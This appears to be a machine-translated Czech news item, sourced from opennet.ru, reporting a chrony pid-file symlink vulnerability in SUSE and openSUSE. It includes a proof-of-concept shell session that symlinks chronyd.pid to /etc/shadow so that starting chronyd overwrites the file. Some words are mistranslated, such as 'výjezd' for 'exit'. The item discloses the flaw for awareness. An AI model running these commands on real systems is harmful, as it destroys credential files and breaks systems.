В
Tato zranitelnost je způsobena nebezpečným vytvořením souboru pid, který byl vytvořen ve fázi, kdy chrony ještě neresetoval oprávnění a byl spuštěn jako root. V tomto případě byl adresář /run/chrony, ve kterém je zapsán soubor pid, vytvořen s právy 0750 prostřednictvím systemd-tmpfiles nebo při spuštění chronyd ve spojení s uživatelem a skupinou „chrony“. Pokud tedy máte přístup k uživatelské chrony, je možné nahradit pid soubor /run/chrony/chronyd.pid symbolickým odkazem. Symbolický odkaz může ukazovat na jakýkoli systémový soubor, který bude při spuštění chronydu přepsán.
root# systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ výjezd
root# /usr/sbin/chronyd -n
^C
# místo obsahu /etc/shadow bude uloženo ID procesu chronyd
root# cat /etc/shadow
15287
Zranitelnost
Problém SUSE a openSUSE
Zdroj: opennet.ru